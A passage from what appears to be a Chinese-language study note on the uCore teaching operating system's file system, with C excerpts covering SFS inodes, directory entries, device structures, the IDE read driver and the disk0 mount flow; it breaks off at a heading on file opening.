info[SFS_MAX_INFO_LEN + <span class="number">1</span>];                <span class="comment">/* infomation for sfs  */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>第1个块放了一个root-dir的inode，用来记录根目录的相关信息。root-dir是SFS文件系统的根结点，通过这个root-dir的inode信息就可以定位并查找到根目录下的所有文件信息。</p></li><li><p>从第2个块开始，根据SFS中所有块的数量，用1个bit来表示一个块的占用和未被占用的情况。这个区域称为SFS的freemap区域，这将占用若干个块空间。为了更好地记录和管理freemap区域</p></li><li><p>最后在剩余的磁盘空间中，存放了所有其他目录和文件的inode信息和内容数据信息。需要注意的是虽然inode的大小小于一个块的大小（4096B），但为了实现简单，每个 inode 都占用一个完整的 block。</p></li></ul><h6 id="索引结点">索引结点</h6><ul><li><p>在<code>sfs</code>层面上，<code>inode</code>结构既可表示文件<code>file</code>、目录<code>dir</code>，也可表示设备<code>device</code>。而区分<code>inode</code>结构的操作有两种，一种是其<code>in_info</code>成员变量，另一种是该结构的成员指针<code>in_ops</code>。以下是函数<code>sfs_get_ops</code>的源码，该函数返回某个属性（文件/目录）所对应的<code>inode</code>操作：</p><blockquote><p>注意，设置inode_ops的操作不止一处，以下代码只作为示例。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * sfs_get_ops - return function addr of fs_node_dirops/sfs_node_fileops</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> *</span><br><span class="line"><span class="built_in">sfs_get_ops</span>(<span class="type">uint16_t</span> type) &#123;</span><br><span class="line">    <span class="keyword">switch</span> (type) &#123;</span><br><span class="line">    <span class="keyword">case</span> SFS_TYPE_DIR:</span><br><span class="line">        <span class="keyword">return</span> &amp;sfs_node_dirops;</span><br><span class="line">    <span class="keyword">case</span> SFS_TYPE_FILE:</span><br><span class="line">        <span class="keyword">return</span> &amp;sfs_node_fileops;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;invalid file type %d.\n&quot;</span>, type);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当uCore创建一个<strong>用于存储文件/目录</strong>的<code>inode</code>结构（即该<code>inode</code>结构的<code>in_info</code>成员变量为<code>sfs_inode</code>类型）时，程序会执行函数<code>sfs_create_inode</code>。该函数会将<code>inode</code>结构中的<code>sfs_inode</code>成员与磁盘对应结点<code>sfs_disk_inode</code>相关联，从而使得只凭<code>inode</code>即可操作该结点。</p><blockquote><p>用于描述设备<code>device</code>的<code>inode</code>会在其他函数中被初始化，不会执行函数<code>sfs_create_inode</code></p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * sfs_create_inode - alloc a inode in memroy, and init din/ino/dirty/reclian_count/sem fields in sfs_inode in inode</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">sfs_create_inode</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="keyword">struct</span> sfs_disk_inode *din, <span class="type">uint32_t</span> ino, <span class="keyword">struct</span> inode **node_store)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span class="keyword">if</span> ((node = <span class="built_in">alloc_inode</span>(sfs_inode)) != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">vop_init</span>(node, <span class="built_in">sfs_get_ops</span>(din-&gt;type), <span class="built_in">info2fs</span>(sfs, sfs));</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">sfs_inode</span> *sin = <span class="built_in">vop_info</span>(node, sfs_inode);</span><br><span class="line">        sin-&gt;din = din, sin-&gt;ino = ino, sin-&gt;dirty = <span class="number">0</span>, sin-&gt;reclaim_count = <span class="number">1</span>;</span><br><span class="line">        <span class="built_in">sem_init</span>(&amp;(sin-&gt;sem), <span class="number">1</span>);</span><br><span class="line">        *node_store = node;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> -E_NO_MEM;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><strong>磁盘索引结点</strong>——保存在硬盘中的索引结点</p><p><code>sfs_disk_inode</code>结构记录了文件或目录的内容存储的索引信息，该数据结构在硬盘里储存，需要时读入内存。<code>type</code>成员表明该结构是目录类型还是文件类型，又或者是链接<code>link</code>类型。如果<code>inode</code>表示的是文件，则成员变量<code>direct[]</code>直接指向了保存文件内容数据的数据块索引值。<code>indirect</code>指向的是间接数据块，此数据块实际存放的全部是数据块索引，这些数据块索引指向的数据块才被用来存放文件内容数据。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* file types */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_INVAL                              0       <span class="comment">/* Should not appear on disk */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_FILE                               1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_DIR                                2</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_LINK                               3</span></span><br><span class="line"><span class="comment">/* inode (on disk) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_disk_inode</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> size;                                  <span class="comment">/* size of the file (in bytes) */</span></span><br><span class="line">    <span class="type">uint16_t</span> type;                                  <span class="comment">/* one of SYS_TYPE_* above */</span></span><br><span class="line">    <span class="type">uint16_t</span> nlinks;                                <span class="comment">/* # of hard links to this file */</span></span><br><span class="line">    <span class="type">uint32_t</span> blocks;                                <span class="comment">/* # of blocks */</span></span><br><span class="line">    <span class="type">uint32_t</span> direct[SFS_NDIRECT];                   <span class="comment">/* direct blocks */</span></span><br><span class="line">    <span class="type">uint32_t</span> indirect;                              <span class="comment">/* indirect blocks */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>对于普通文件，索引值指向的 block 中保存的是文件中的数据。而对于目录，索引值指向的数据保存的是目录下所有的文件名以及对应的索引节点所在的索引块（磁盘块）所形成的数组。数据结构如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* file entry (on disk) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_disk_entry</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> ino;                                   <span class="comment">/* inode number */</span></span><br><span class="line">    <span class="type">char</span> name[SFS_MAX_FNAME_LEN + <span class="number">1</span>];               <span class="comment">/* file name */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p><strong>内存索引结点</strong>——保存在内存中的索引结点</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* inode for sfs */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_inode</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_disk_inode</span> *din;                     <span class="comment">/* on-disk inode */</span></span><br><span class="line">    <span class="type">uint32_t</span> ino;                                   <span class="comment">/* inode number */</span></span><br><span class="line">    <span class="type">bool</span> dirty;                                     <span class="comment">/* true if inode modified */</span></span><br><span class="line">    <span class="type">int</span> reclaim_count;                              <span class="comment">/* kill inode if it hits zero */</span></span><br><span class="line">    <span class="type">semaphore_t</span> sem;                                <span class="comment">/* semaphore for din */</span></span><br><span class="line">    <span class="type">list_entry_t</span> inode_link;                        <span class="comment">/* entry for linked-list in sfs_fs */</span></span><br><span class="line">    <span class="type">list_entry_t</span> hash_link;                         <span class="comment">/* entry for hash linked-list in sfs_fs */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>SFS中的内存<code>sfs_inode</code>除了包含SFS的硬盘<code>sfs_disk_inode</code>信息，而且还增加了其他一些信息。这些信息用于判断相关硬盘位置是否改写、互斥操作、回收和快速地定位等作用。</p><blockquote><p>需要注意的是，一个内存<code>sfs_inode</code>是在打开一个文件后才创建的，如果关机则相关信息都会消失。而硬盘<code>sfs_disk_inode</code>的内容是保存在硬盘中的，只是在进程需要时才被读入到内存中，用于访问文件或目录的具体内容数据</p></blockquote></li><li><p><strong>文件结点</strong>——用于<strong>指向磁盘索引结点</strong>的结点，其结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* file entry (on disk) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_disk_entry</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> ino;                                   <span class="comment">/* inode number */</span></span><br><span class="line">    <span class="type">char</span> name[SFS_MAX_FNAME_LEN + <span class="number">1</span>];               <span class="comment">/* file name */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>文件结点中的<code>name</code>表示当前文件的文件名，而其<code>ino</code>成员则指向了<code>sfs_disk_inode</code>磁盘索引结点。上一层的目录索引结点则会指向各个下层的文件结点。</p><blockquote><p>将文件结点和磁盘索引结点分开，有助于<strong>硬链接</strong>的实现。</p></blockquote></li><li><p>同时，为了方便实现上面提到的多级数据的访问以及目录中 entry 的操作，对于<code>inode</code>，SFS实现了一些辅助的函数，它们分别是</p><blockquote><p>备注：这些函数的功能最好在阅读源码时详细了解。</p></blockquote><ul><li><p><code>sfs_bmap_load_nolock</code></p><blockquote><p>将对应<code>sfs_inode</code>的第 <code>index</code> 个索引指向的 block 的索引值取出，并存到相应的指针指向的单元（<code>ino_store</code>）。</p></blockquote></li></ul><blockquote><p>如果<code>index == din-&gt;blocks</code>, 则将会为<code>inode</code>增长一个 block。并标记 <code>inode</code> 为 dirty</p></blockquote><ul><li><p><code>sfs_bmap_truncate_nolock</code></p><blockquote><p>将多级数据索引表的最后一个 entry 释放掉。该函数可以认为是<code>sfs_bmap_load_nolock</code>中，<code>index == inode-&gt;blocks</code>的逆操作。</p></blockquote></li><li><p><code>sfs_dirent_read_nolock</code></p><blockquote><p>将目录的第 slot 个 entry 读取到指定的内存空间。</p></blockquote></li><li><p><code>sfs_dirent_search_nolock</code></p><blockquote><p>该函数是常用的查找函数，函数会在目录下查找 name，并且返回相应的搜索结果（文件或文件夹）的 inode 的编号（也是磁盘编号），和相应的 entry 在该目录的 index 编号以及目录下的数据页是否有空闲的 entry。</p></blockquote></li></ul><blockquote><p>需要注意的是，这些后缀为<code>nolock</code>的函数，只能在已经获得相应<code>inode</code>的<code>semaphore</code>才能调用。</p></blockquote></li></ul><h5 id="4-外设接口层-I-O设备">4) 外设接口层(I/O设备)</h5><ul><li><p>在底层一点就是I/O设备的相关实现，例如结构体<code>device</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> dop_open(dev, open_flags)           ((dev)-&gt;d_open(dev, open_flags))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> dop_close(dev)                      ((dev)-&gt;d_close(dev))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> dop_io(dev, iob, write)             ((dev)-&gt;d_io(dev, iob, write))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> dop_ioctl(dev, op, data)            ((dev)-&gt;d_ioctl(dev, op, data))</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">device</span> &#123;</span><br><span class="line">    <span class="type">size_t</span> d_blocks;</span><br><span class="line">    <span class="type">size_t</span> d_blocksize;</span><br><span class="line">    <span class="built_in">int</span> (*d_open)(<span class="keyword">struct</span> device *dev, <span class="type">uint32_t</span> open_flags);</span><br><span class="line">    <span class="built_in">int</span> (*d_close)(<span class="keyword">struct</span> device *dev);</span><br><span class="line">    <span class="built_in">int</span> (*d_io)(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> iobuf *iob, <span class="type">bool</span> write);</span><br><span class="line">    <span class="built_in">int</span> (*d_ioctl)(<span class="keyword">struct</span> device *dev, <span class="type">int</span> op, <span class="type">void</span> *data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>该结构体支持对块设备、字符设备的表示，完成对设备的基本操作。</p><p>不同底层设备所调用的函数方法是不同的，例如以下两个函数就是对不同设备<code>device</code>结构体的初始化</p><blockquote><p>需要注意的是，常用的<code>stdin</code>和<code>stdout</code>在uCore中是作为输入输出设备，与<code>disk0</code>处于同一个层次。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stdin_device_init</span><span class="params">(<span class="keyword">struct</span> device *dev)</span> </span>&#123;</span><br><span class="line">    dev-&gt;d_blocks = <span class="number">0</span>;</span><br><span class="line">    dev-&gt;d_blocksize = <span class="number">1</span>;</span><br><span class="line">    dev-&gt;d_open = stdin_open;</span><br><span class="line">    dev-&gt;d_close = stdin_close;</span><br><span class="line">    dev-&gt;d_io = stdin_io;</span><br><span class="line">    dev-&gt;d_ioctl = stdin_ioctl;</span><br><span class="line"></span><br><span class="line">    p_rpos = p_wpos = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">wait_queue_init</span>(wait_queue);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">disk0_device_init</span><span class="params">(<span class="keyword">struct</span> device *dev)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">static_assert</span>(DISK0_BLKSIZE % SECTSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">ide_device_valid</span>(DISK0_DEV_NO)) &#123;</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;disk0 device isn&#x27;t available.\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    dev-&gt;d_blocks = <span class="built_in">ide_device_size</span>(DISK0_DEV_NO) / DISK0_BLK_NSECT;</span><br><span class="line">    dev-&gt;d_blocksize = DISK0_BLKSIZE;</span><br><span class="line">    dev-&gt;d_open = disk0_open;</span><br><span class="line">    dev-&gt;d_close = disk0_close;</span><br><span class="line">    dev-&gt;d_io = disk0_io;</span><br><span class="line">    dev-&gt;d_ioctl = disk0_ioctl;</span><br><span class="line">    <span class="built_in">sem_init</span>(&amp;(disk0_sem), <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">static_assert</span>(DISK0_BUFSIZE % DISK0_BLKSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> ((disk0_buffer = <span class="built_in">kmalloc</span>(DISK0_BUFSIZE)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;disk0 alloc buffer failed.\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>结构体<code>device</code>只表示了一个设备所能使用的功能，我们需要一个数据结构用于将<code>device</code>和<code>fs</code>关联。同时，为了将连接的所有设备连接在一起，uCore定义了一个链表，通过该链表即可访问到所有设备。而这就是定义<code>vfs_dev_t</code>结构体的目的。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// device info entry in vdev_list</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *devname;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *devnode;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fs</span> *fs;</span><br><span class="line">    <span class="type">bool</span> mountable;</span><br><span class="line">    <span class="type">list_entry_t</span> vdev_link;</span><br><span class="line">&#125; <span class="type">vfs_dev_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> le2vdev(le, member)                         \</span></span><br><span class="line"><span class="meta">  to_struct((le), vfs_dev_t, member)</span></span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">list_entry_t</span> vdev_list;     <span class="comment">// device info list in vfs layer</span></span><br><span class="line"><span class="type">static</span> <span class="type">semaphore_t</span> vdev_list_sem;</span><br></pre></td></tr></table></figure></li><li><p><code>stdin</code>和<code>stdout</code>在uCore中被视为标准输入输出<strong>设备</strong>，与<code>disk0</code>一样，共同被VFS所管理。</p><p>在内核中，uCore并不会主动让每个进程<strong>打开</strong><code>stdin</code>和<code>stdout</code>，但用户程序仍然可以使用诸如<code>write(1, buf, size)</code>这样的语句。这是因为生成用户可执行文件时，<code>umain</code>函数将会被链接入用户的主程序，而该函数中就有针对<code>stdin</code>和<code>stdout</code>相关文件描述符的初始化。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">umain</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> fd;</span><br><span class="line">    <span class="keyword">if</span> ((fd = <span class="built_in">initfd</span>(<span class="number">0</span>, <span class="string">&quot;stdin:&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">warn</span>(<span class="string">&quot;open &lt;stdin&gt; failed: %e.\n&quot;</span>, fd);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((fd = <span class="built_in">initfd</span>(<span class="number">1</span>, <span class="string">&quot;stdout:&quot;</span>, O_WRONLY)) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">warn</span>(<span class="string">&quot;open &lt;stdout&gt; failed: %e.\n&quot;</span>, fd);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">int</span> ret = <span class="built_in">main</span>(argc, argv);</span><br><span class="line">    <span class="built_in">exit</span>(ret);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>再低一个层次就涉及到了硬盘驱动，驱动直接和硬盘I/O接口打交道。例如以下函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">ide_read_secs</span><span class="params">(<span class="type">unsigned</span> <span class="type">short</span> ideno, <span class="type">uint32_t</span> secno, <span class="type">void</span> *dst, <span class="type">size_t</span> nsecs)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(nsecs &lt;= MAX_NSECS &amp;&amp; <span class="built_in">VALID_IDE</span>(ideno));</span><br><span class="line">    <span class="built_in">assert</span>(secno &lt; MAX_DISK_NSECS &amp;&amp; secno + nsecs &lt;= MAX_DISK_NSECS);</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> iobase = <span class="built_in">IO_BASE</span>(ideno), ioctrl = <span class="built_in">IO_CTRL</span>(ideno);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">ide_wait_ready</span>(iobase, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// generate interrupt</span></span><br><span class="line">    <span class="built_in">outb</span>(ioctrl + ISA_CTRL, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_SECCNT, nsecs);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_SECTOR, secno &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_CYL_LO, (secno &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_CYL_HI, (secno &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_SDH, <span class="number">0xE0</span> | ((ideno &amp; <span class="number">1</span>) &lt;&lt; <span class="number">4</span>) | ((secno &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xF</span>));</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_COMMAND, IDE_CMD_READ);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (; nsecs &gt; <span class="number">0</span>; nsecs --, dst += SECTSIZE) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">ide_wait_ready</span>(iobase, <span class="number">1</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">insl</span>(iobase, dst, SECTSIZE / <span class="built_in">sizeof</span>(<span class="type">uint32_t</span>));</span><br><span class="line">    &#125;</span><br><span class="line">out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-文件系统挂载流程">c. 文件系统挂载流程</h4><p>一个文件系统在使用前，需要将其挂载至内核中。在uCore里，硬盘<code>disk0</code>的挂载流程如下：</p><ul><li><p>首先，在<code>fs_init</code>函数中执行<code>init_device(disk0)</code>，初始化对应<code>device</code>结构并将其连接至<code>vdev_list</code>链表中：</p></li><li><p>之后，在<code>fs_init</code>函数中执行<code>sfs_init() -&gt; sfs_mount(&quot;disk0&quot;)</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">vfs_mount</span>(devname, sfs_do_mount);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>紧接着，<code>sfs_mount</code>会调用<code>vfs_mount</code>，在<code>vfs</code>的挂载接口中调用<code>sfs</code>自己的<code>sfs_do_mount</code>挂载函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * vfs_mount - Mount a filesystem. Once we&#x27;ve found the device, call MOUNTFUNC to</span></span><br><span class="line"><span class="comment"> *             set up the filesystem and hand back a struct fs.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The DATA argument is passed through unchanged to MOUNTFUNC.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">vfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="type">int</span> (*mountfunc)(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> fs **fs_store))</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="built_in">lock_vdev_list</span>();</span><br><span class="line">    <span class="comment">// 在设备链表中获取当前待挂载的设备</span></span><br><span class="line">    <span class="type">vfs_dev_t</span> *vdev;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">find_mount</span>(devname, &amp;vdev)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (vdev-&gt;fs != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        ret = -E_BUSY;</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">assert</span>(vdev-&gt;devname != <span class="literal">NULL</span> &amp;&amp; vdev-&gt;mountable);</span><br><span class="line">   <span class="comment">// 执行特定文件系统的挂载程序</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">device</span> *dev = <span class="built_in">vop_info</span>(vdev-&gt;devnode, device);</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">mountfunc</span>(dev, &amp;(vdev-&gt;fs))) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(vdev-&gt;fs != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;vfs: mount %s.\n&quot;</span>, vdev-&gt;devname);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">out:</span><br><span class="line">    <span class="built_in">unlock_vdev_list</span>();</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>sfs_do_mount</code>挂载函数会执行以下几个操作</p><ul><li>从待挂载设备中读取超级块，并验证超级块中，魔数与总块数是否存在错误</li><li>初始化哈希链表</li><li>从待挂载设备中读入<code>freemap</code>并测试其正确性</li><li>设置<code>fs</code>结构的相关信息，并在函数最后将该信息设置为传入的<code>device</code>结构体中的<code>fs</code>成员变量</li></ul></li></ul><h4 id="d-文件打开流程">d. 